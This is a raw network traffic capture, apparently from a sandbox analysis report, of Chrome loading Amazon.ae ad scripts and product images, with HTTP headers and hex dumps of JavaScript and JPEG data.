                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-976,/images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b
                                                                                                                                                                                                                                                                Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-976 /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Via: 1.1 34dde22d7e4e8bb757cb687a7932a122.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 345357
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 0B8gG_5TAhdmhogYMByD9IQ5RejXJnRjuhuMk0SZcTthL7D4WldM8g==
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC14753INData Raw: 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 22 73 66 49 6d 70 72 65 73 73 69 6f 6e 22 2c 74 3d 22 4c 69 67 68 74 41 64 49 6d 70 72 65 73 73 69 6f 6e 22 2c 69 3d 22 76 69 65 77 61 62 6c 65 6c 61 74 65 6e 63 79 22 2c 61 3d 28 65 2c 74 2c 69 29 3d 3e 28 7b 63 73 61 4b 65 79 3a 65 2c 63 73 6d 4b 65 79 3a 74 2c 63 73 6d 4d 65 73 73 61 67 65 3a 69 7d 29 2c 73 3d 28 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 65 29 2c 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 74 29 2c 61 28 22 62 6f 64 79 45 6e 64 22 2c 22 62 65 22 29 29 2c 72 3d 28 61 28 22 63 6c 69 63 6b 54 6f 41 54 46 22 2c 22 61 66 22 29 2c 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65 22 2c 22 63 66 22 29 29 2c 6e 3d 28 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65
                                                                                                                                                                                                                                                                Data Ascii: (()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC16249INData Raw: 73 74 20 74 3d 65 2e 69 6e 6e 65 72 48 54 4d 4c 3b 73 2e 61 73 79 6e 63 3d 21 31 2c 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 60 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 2c 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 7d 60 29 7d 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 73 2c 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 2c 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 69 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 2c 5f 65 3d 65 3d 3e 7b 69 66 28 6e 75 6c 6c 3d 3d 64 6f 63
                                                                                                                                                                                                                                                                Data Ascii: st t=e.innerHTML;s.async=!1,s.setAttribute("src",`data:text/javascript;charset=UTF-8,${encodeURIComponent(t)}`)}null===(t=e.parentNode)||void 0===t||t.insertBefore(s,e.nextSibling),null===(i=e.parentNode)||void 0===i||i.removeChild(e)},_e=e=>{if(null==doc


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                49192.168.2.449887151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC667OUTGET /images/G/39/Associates/AE_HSBC_BTS_AUG_GW_DC_758x608_EN._SY304_CB568253382_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 8552
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 31766cf3-5849-490e-a3ae-ae5e3ea2717b
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Fri, 02 Aug 2024 07:45:49 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Thu, 28 Jul 2044 07:53:22 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:27 GMT
                                                                                                                                                                                                                                                                Age: 883804
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100152-IAD, cache-nyc-kteb1890075-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 30 01 7b 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 07 01 04 05 06 08 09 03 02 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea e0 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*0{"6
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 98 90 db 57 16 75 d1 d9 9f 45 ab 3f 95 62 8d 75 22 5a 0b 7c 87 11 08 7a 5c aa b4 c1 34 8c fb 4e 87 35 1d 97 62 53 ad 9b 6d b3 6f 08 ec 8b 00 2d 8f 02 4d 51 52 9a 6d d5 66 3c 3a 08 0e c8 39 62 b2 43 46 1c 11 38 ae 14 08 d8 b0 a5 2e 58 bf 52 a3 48 96 fc 9c 1d cd d4 82 66 f9 ae 50 5c 1b 63 67 9c 97 cf d3 8f 6e 17 98 e7 21 8c 1b 1b 0e d3 4e b8 f5 5a 97 48 8c ad 0f 64 a8 f7 78 f1 18 64 15 8b f4 67 57 4e 12 e4 8c 56 c9 c2 0d c6 23 3b 34 9d 86 51 a3 b3 30 22 bb bc d3 6e 71 5b cc 54 ae b5 12 98 b9 c7 7c b0 6d fb 8b 11 8b 07 3a d4 4a 66 e7 1d f2 c0 3d 50 f6 e3 3f cb bf c2 12 e3 6f 15 a4 4a 6e c3 24 c7 2a 30 50 55 12 f0 f4 c5 70 09 a2 b8 db 8e 69 36 8b 2e 20 c9 69 5a 5e 89 28 d0 19 70 01 01 10 53 81 78 6c c9 55 6a e1 6c e4 50 75 f0 f4 52 57 15 fa bf 2f ea 8e 9a f0
                                                                                                                                                                                                                                                                Data Ascii: WuE?bu"Z|z\4N5bSmo-MQRmf<:9bCF8.XRHfP\cgn!NZHdxdgWNV#;4Q0"nq[T|m:Jf=P?oJn$*0PUpi6. iZ^(pSxlUjlPuRW/
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 90 08 11 88 3e 81 10 ce 58 db 58 55 3f 1f 58 4b 3b 08 68 fe 9b a2 63 e0 5e 8a 5a 2b 60 e6 0c 32 9f 00 b1 3d c3 91 d8 92 7b fa ee 75 d6 06 20 e4 1b 49 18 f0 f1 31 31 31 31 31 e0 f4 80 81 37 13 61 89 b0 ce 66 c0 cd 81 9b 76 87 19 e9 fb e6 bd 17 a3 7b aa a7 ba aa 2d c8 df 6f 87 7f 19 a0 d5 6a a4 5b 49 0c f4 b5 6d ab 57 c3 b5 ad 81 7a 0a 91 02 53 c5 8b 46 0f 82 fb 6a 74 20 82 76 e1 7f 8a 71 05 34 f9 e9 29 a0 e5 f1 7f 6a c4 0d b0 d0 67 03 3e 0d dc 20 b0 64 57 70 a6 9f 99 ed 67 6d 9a bb da b6 c8 b9 f9 c8 9c ba b8 51 50 f1 0d 6a 7b f2 52 72 52 04 51 db f7 bf ff c4 00 2d 11 00 01 03 03 02 02 08 07 00 00 00 00 00 00 00 00 01 02 03 05 00 04 11 12 40 06 21 10 13 14 15 16 20 41 50 24 30 31 34 35 51 60 ff da 00 08 01 03 01 01 08 00 fe 98 ac 0a 4a c9 ae b4 d0 5a 89 e6
                                                                                                                                                                                                                                                                Data Ascii: >XXU?XK;hc^Z+`2={u I111117afv{-oj[ImWzSFjt vq4)jg> dWpgmQPj{RrRQ-@! AP$0145Q`JZ
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: ad c3 e1 90 75 b7 cb 2e 9f ed c9 bc 55 35 8d aa 99 01 37 a6 9d 19 01 bd 23 1d 58 e2 aa 79 a2 aa cd ed 9d 6b 39 b8 53 a5 31 fc 11 c4 73 4d 51 ad 06 b2 ac dd 1b 51 90 79 45 4d 06 d5 53 93 70 f8 65 1d 6d f2 5a 7f b7 2e f1 c9 4d 63 6a 38 2f c7 e0 9f a8 73 4a 32 0b 9b dc 9b 79 99 bc 35 23 1d 0e c3 8d 15 01 6f 13 29 f8 8b d8 41 3a d0 bb 65 2e 8f 7e 0b 45 a7 83 3c d0 cd 23 b3 ab a9 12 43 b6 f2 8e dd 8b b7 6e 4d c3 e1 97 47 6e f2 ae a7 6d eb cb bc 72 60 d1 53 e4 84 00 bf 1f 82 b1 65 07 30 21 02 f3 70 18 0d 14 c8 1b e4 e1 d1 82 ba d7 e1 17 75 fb 96 f0 8e a9 57 27 3a b1 35 2b 40 9d 54 a6 72 d1 71 9f 73 bc 93 c1 11 86 3a 49 97 40 e9 99 e5 3d bb 17 6e d5 b8 7c 32 68 ed de f9 65 ae a7 6d eb c9 bc 56 0d 15 3e 48 40 19 04 dd 98 c6 2b 90 67 e1 8c ec c1 36 63 5d 0a 69 3d
                                                                                                                                                                                                                                                                Data Ascii: u.U57#Xyk9S1sMQQyEMSpemZ.Mcj8/sJ2y5#o)A:e.~E<#CnMGnmr`Se0!puW':5+@Trqs:I@=n|2hemV>H@+g6c]i=
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 95 17 b3 88 90 10 ba 32 b0 cc 3a 95 62 1c 0d 75 e1 2d 6c 33 9a 8d 3e fa 79 d2 91 a7 d2 1b 04 cd 38 b8 9c 4b 9e ad 7d 6a de 61 6c dd a3 e2 86 4d 14 61 99 3e ef ad 5f f2 dd 92 4d a3 d2 d9 91 9a 04 62 16 5e 45 2a d6 bf e6 b9 1d 09 db 6c c5 a4 a9 dd 76 69 24 e8 7f 92 8d 69 86 6c 17 dd 7e 0e ba 6d 6a b0 f7 41 66 93 a9 a0 cc 50 1f d6 35 b2 51 59 7b 5f 56 0b 83 e5 5a 8a f8 22 7b 99 f3 fa ac 1f d8 60 fe c0 78 35 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 4a 6b ff 00 9d 6a 16 cb 02 c6 4c 6c 4d 7e e9 5f ba 57 ee 95 fb a5 7e e9 49 00 ab 80 4a d1 aa e1 44 d5 19 1e 7f a8 c9 ce ed c1 bd 25 93 f2 36 1c 56 99 b4 b4 e7 ee 3f 82 20 09 56 c1 75 9a 32 04 bc 1a 4f ef cd 5d cd 6d 63 f2 68 d3 d1 2b d4 76 79 3f
                                                                                                                                                                                                                                                                Data Ascii: 2:bu-l3>y8K}jalMa>_Mb^E*lvi$il~mjAfP5QY{_VZ"{`x5\\\\\\\\\\\\JkjLlM~_W~IJD%6V? Vu2O]mch+vy?
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 1f 34 fa 5f 82 79 0b e2 e9 05 b7 40 6d 8b 55 60 91 02 d0 d8 5c 05 da f8 35 b9 34 13 82 ee 7a 7e 73 04 e0 34 02 d5 e8 45 a0 ec 3d 75 07 90 5e ac 10 d4 41 c5 67 88 52 9b ac b5 9d 09 18 37 a2 2d 80 7b 8a 38 d0 9d 21 2b 33 a2 38 ae a0 56 17 cc 3e 97 e0 9e 42 f8 ba 47 3a a9 32 0a 33 d0 8c a0 ab ef b7 d9 49 c3 21 9d 13 10 d0 78 50 3f b0 4f 59 41 0e 1e f5 04 46 63 a5 aa b5 6a d9 4b ce 64 b5 ef ed fe 57 90 1f 7f 63 f8 af 81 c6 9c e3 57 79 2d d2 b8 46 af 43 6b c0 5d e9 fe df 99 f4 bf 04 f1 b9 dd 0b 6d 62 a7 66 98 70 e4 b0 4e 05 0e 6c d2 56 82 ea 38 38 03 60 82 62 b7 33 fd 12 ef b4 42 0f 88 0d 36 b1 fe 01 bd bd 44 3f e2 0a 10 3b d6 76 b5 fc bc 0d 5d aa 6b f9 ea 33 13 24 3f ed 2b 68 4d 1a 90 02 f5 a4 34 a9 85 b5 a8 17 cc fa 5f 82 7a b7 d2 fc 13 d5 be 97 e0 9f c2 5b
                                                                                                                                                                                                                                                                Data Ascii: 4_y@mU`\54z~s4E=u^AgR7-{8!+38V>BG:23I!xP?OYAFcjKdWcWy-FCk]mbfpNlV88`b3B6D?;v]k3$?+hM4_z[
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC284INData Raw: a2 cd 0f 32 52 94 a5 6c c2 76 90 aa d5 d5 58 ad aa b5 52 ab 97 ff 00 05 ff 00 ff c4 00 1f 11 00 02 02 01 04 03 00 00 00 00 00 00 00 00 00 00 00 01 31 40 10 02 20 32 60 50 71 81 ff da 00 08 01 02 01 09 3f 00 ed 2e e3 c3 b0 ba 2f be 86 cd 48 d4 87 53 96 de 54 a4 9c 7c 23 12 4d 2e 44 ec 9a 88 48 48 5e 7b ff c4 00 2d 11 00 01 02 04 03 07 02 07 00 00 00 00 00 00 00 00 01 00 02 03 11 21 61 32 41 91 12 22 31 40 51 71 c1 13 42 50 52 62 72 80 a1 a2 ff da 00 08 01 03 01 09 3f 00 fc 27 86 5c 2c 14 17 68 54 17 68 53 0b 7b f2 94 80 3f ab 05 46 86 b5 b2 c8 84 6c 47 43 75 57 9c 21 6f 6d 36 47 5c 95 60 9c 27 c3 b9 20 4c 29 ef 49 4b d3 96 ec 97 46 ae 1e fe 92 ba c7 fa 97 d3 65 f2 a9 7a 59 cf c5 d4 f6 32 9f 19 5f 92 ac 03 c6 d7 6a 33 86 5a d7 13 90 08 53 3b dc ac 5c 5a 7a
                                                                                                                                                                                                                                                                Data Ascii: 2RlvXR1@ 2`Pq?./HST|#M.DHH^{-!a2A"1@QqBPRbr?'\,hThS{?FlGCuW!om6G\`' L)IKFezY2_j3ZS;\Zz


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                50192.168.2.449890151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911846_186x116_1X_en_AE._SY116_CB566464918_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 5618
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: ddd5448b-8393-4010-8675-716a43b5cd0a
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 06 Aug 2024 06:38:52 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Tue, 02 Aug 2044 12:43:42 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 434385
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:27 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200064-IAD, cache-nyc-kteb1890035-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 06 04 06 06 06 06 08 0d 09 09 08 09 09 10 0c 09 0c 0b 0f 09 0b 0b 0f 0b 0f 0f 0b 0d 0f 0d 0d 11 0f 0d 0d 0f 11 0d 0f 10 17 10 12 10 14 11 10 15 10 17 10 17 16 16 17 19 1a 17 0f 19 23 01 06 06 03 06 06 06 08 06 06 0d 15 0f 09 11 16 12 08 10 1a 16 1a 11 16 17 16 16 10 1d 16 1a 15 16 0d 17 16 11 14 14 11 11 12 10 12 16 11 17 17 17 09 10 17 15 0f 1f 10 11 0f 16 15 19 14 0f 17 1c ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9c 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 06 07 04 05 00 03 08 02 09 01 10 00 02 01 03 02 03 05 06 02 07 06 04 07 00 00 00 01 02 03 00 04 11 05 12 06 21 31 07 13 41 51 61 14 22 32 71 81 91 08 a1 15 23 42 72 92 b1 d1 24 62 82
                                                                                                                                                                                                                                                                Data Ascii: JFIF#t"!1AQa"2q#Br$b
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 17 10 5d c7 bd 17 ae c3 d1 d3 3e 3b 4f 4a 4f 5c cf ec e9 ea 69 96 32 b6 fa 64 dd 47 59 45 e4 0f d2 97 f7 f7 ed 72 c7 1d 2a 3e a3 7e 09 2d 43 d3 5e 81 e8 4d 4c 09 93 2c ed a5 c4 9d 71 8a 8f 7f 7d 92 6a 04 5a 8a 80 50 0c 9f 3a a6 bb b8 63 93 57 85 c8 65 c3 96 24 a5 44 ef db ce b5 7b 76 c5 24 8c d4 6f d2 cd ff 00 c4 7d aa 62 c2 4e 21 e0 d5 58 d5 8d b6 b0 22 4f 5a d7 fa 28 75 a9 f6 da 42 3a 1c f5 a7 65 03 23 4c 80 9a 91 66 cd 4e 83 51 0b 22 93 5e 06 97 b5 b1 5b 93 4d dc e0 54 bc 48 5e db f1 00 1b b1 92 7c ea 0d ee ba d2 f8 56 f8 34 67 4c ed 35 02 ef 4e 99 6a 92 89 39 24 da ea 86 54 da 16 ae e2 d1 2e 5d 04 d8 3c c7 4a a8 d3 23 9a d0 17 14 77 0f 17 b2 c4 13 1e f5 4b 2f 41 2b 02 7a ed dc da 1e 9f 2d c3 ae 1f 2a 23 07 a1 77 3b 53 f3 39 3e 82 8a ac 3b 47 d2 f8 77
                                                                                                                                                                                                                                                                Data Ascii: ]>;OJO\i2dGYEr*>~-C^ML,q}jZP:cWe$D{v$o}bN!X"OZ(uB:e#LfNQ"^[MTH^|V4gL5Nj9$T.]<J#wK/A+z-*#w;S9>;Gw
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: 2f 19 70 cf bf 31 22 46 30 a3 15 b6 a2 07 af 41 e9 66 82 43 20 27 38 ad 6f 6e 8c e2 42 32 45 0d f1 37 17 e9 fc 35 6d ed 9a 9c eb 6f 09 75 4d ed 92 37 37 41 c8 1f 2a 45 f1 1f e2 97 87 b4 fb 81 05 b3 9b a4 da bf af 8b 98 04 f9 02 b8 35 0b b3 7d 0e a7 e0 ab 47 ba 9e e4 a0 0d 22 62 94 16 bd 89 49 0d fb 91 36 20 39 3d 39 d2 3e d7 f1 7f 16 9d 73 37 b5 49 35 dc 65 8e c5 10 45 6c 13 9f 8b 61 d8 f2 f4 ae cc ec fb 8d e0 e3 0d 22 d3 57 b7 1b 52 70 dc bc 8a 12 ad d4 03 8c 8e b8 19 aa 74 53 28 49 71 4f 63 12 a4 d1 b5 ae 19 65 75 1e 5b 33 e2 69 65 c5 3c 09 37 0e 3d cb 5d 7b d1 43 11 72 e3 ca bb 7e 5d 56 de 32 55 9b 25 7c 15 1a 4c 7f 08 35 cf bf 88 ab d3 71 a0 4a 96 30 cb 34 b3 cb 0a 30 58 64 c8 45 3b c9 3e e8 e5 cb 14 12 a5 64 da 0a 14 63 3a 91 52 e8 e1 be cb 34 a9 35
                                                                                                                                                                                                                                                                Data Ascii: /p1"F0AfC '8onB2E75mouM77A*E5}G"bI6 9=9>s7I5eEla"WRptS(IqOceu[3ie<7=]{Cr~]V2U%|L5qJ040XdE;>dc:R45
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC1378INData Raw: ca fc 2e 74 7b b4 b8 dd 0d fb 08 6e a2 e8 22 91 8e 50 9f 22 aa fb b3 e2 b9 ac da aa 89 41 5b b6 6a a1 42 73 c9 7a 5c 9d 29 aa f6 79 6b a9 4a 67 95 f0 a5 79 6d f7 70 57 d2 b5 c5 a4 5a 5a 09 a0 8b de 2e 17 2c 79 f2 5c f5 1e 26 99 10 69 01 0c 6e ef b9 94 0f 87 9a 9f a5 7e 4f 61 18 2f 20 4c b8 18 db 80 07 ce b9 8f 51 21 eb 46 85 f5 8f 11 9b 09 d3 d8 a1 17 37 05 40 51 8d c5 31 cb 03 18 c6 6b 7e bb 77 0e a4 d3 ae af 03 23 81 c9 63 1b 54 93 cd 77 1e 74 53 a6 e9 d1 41 29 b9 b7 88 2b ab 75 07 e9 ce a5 4b a8 c9 0c ec e2 21 23 60 8f 7b 1f ca ab 73 d9 6f 4f 2e 90 a7 9f 81 96 00 d3 58 21 62 a8 4b 1d fc d4 1f 2f e9 4b 77 3a b6 4f ea db a9 ae 81 bb 96 08 09 91 d1 50 85 18 54 3e e8 39 f2 f3 a0 56 d6 6e f2 7f b7 ad 5e fa 7d 95 e2 cb d0 fe 5d 7e 7c ab 21 da bd 06 7e 5c c6
                                                                                                                                                                                                                                                                Data Ascii: .t{n"P"A[jBsz\)ykJgympWZZ.,y\&in~Oa/ LQ!F7@Q1k~w#cTwtSA)+uK!#`{soO.X!bK/Kw:OPT>9Vn^}]~|!~\
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC106INData Raw: 42 84 72 58 10 14 87 1d 08 f1 35 95 95 8e a7 dd 9b 29 fd 10 43 b0 2a ae 05 42 96 4d fd f7 ba 3d dc 78 79 d6 56 52 d8 68 19 87 13 3c e5 80 25 0e 3a 0e 63 d6 84 35 f9 5e 1b 50 ca d8 2c 24 f2 18 da 4a 8f e5 59 59 42 18 b9 b3 b3 12 c1 71 34 8e ce c9 d0 12 36 f2 f4 c5 09 b5 d4 99 3e fb ff 00 cc 7f fb ab 2b 28 88 7f ff d9
                                                                                                                                                                                                                                                                Data Ascii: BrX5)C*BM=xyVRh<%:c5^P,$JYYBq46>+(


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                51192.168.2.449893151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC375OUTGET /images/I/612naZmko3L._SX1500_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC682INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 74677
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 4cf802fe-ebc3-4ce5-9844-79e15120c24d
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
